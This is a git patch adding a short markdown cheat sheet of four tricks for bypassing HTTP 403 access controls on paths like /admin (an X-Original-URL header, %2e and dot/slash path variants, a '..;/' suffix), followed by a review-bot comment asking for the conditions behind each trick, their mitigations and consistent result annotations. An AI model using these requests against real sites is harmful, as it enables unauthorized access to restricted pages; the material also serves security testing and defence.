From 4c32ea9202b0a47e4288be85dec2fb89f108fc00 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Wed, 9 Sep 2020 21:53:05 +0700 Subject: [PATCH] Bypass 403 [1] Create how to bypass 403 Code and add 4 tips --- Bypass403.md | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 Bypass403.md diff --git a/Bypass403.md b/Bypass403.md new file mode 100644 index 0000000..540a419 --- /dev/null +++ b/Bypass403.md @@ -0,0 +1,42 @@ +# 403 Forbidden Bypass + +1. Using "X-Original-URL" header +``` +GET /admin HTTP/1.1 +Host: target.com +``` +Try this to bypass +``` +GET /anything HTTP/1.1 +Host: target.com +X-Original-URL: /admin +``` + +2. Appending **%2e** after the first slash +``` +http://target.com/admin => 403 +``` +Try this to bypass +``` +http://target.com/%2e/admin => 200 +``` + +3. Try add dot (.) and slash (/) in the URL +``` +http://target.com/admin => 403 +``` +Try this to bypass +``` +http://target.com/admin/. => 200 +http://target.com//admin// => 200 +http://target.com/./admin/./ => 200 +``` + +4. Add "..;/" after the directory name +``` +http://target.com/admin +``` +Try this to bypass +``` +http://target.com/admin..;/ +```
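Review bot: the four tips in the new Bypass403.md never say what each one depends on, so a reader cannot tell when a tip applies or what the underlying fix is. Tip 1 only works where the backend or framework honors `X-Original-URL` and the access check was made on the request line instead. Tips 2 to 4 only work where the access check compares the raw path while the application routes on a normalized one. Suggest one sentence per tip naming that condition and the matching mitigation: strip or ignore `X-Original-URL` at the edge, and enforce authorization on the same normalized path the application routes on. The examples are also inconsistent. Tips 2 and 3 annotate results with `=> 403` and `=> 200`, while tip 4 (`http://target.com/admin..;/`) and both requests in tip 1 show no expected response. Add the annotations there, or state that the result varies by server. Minor wording: "Try add dot (.) and slash (/)" should read "Try adding a dot (.) and slash (/)".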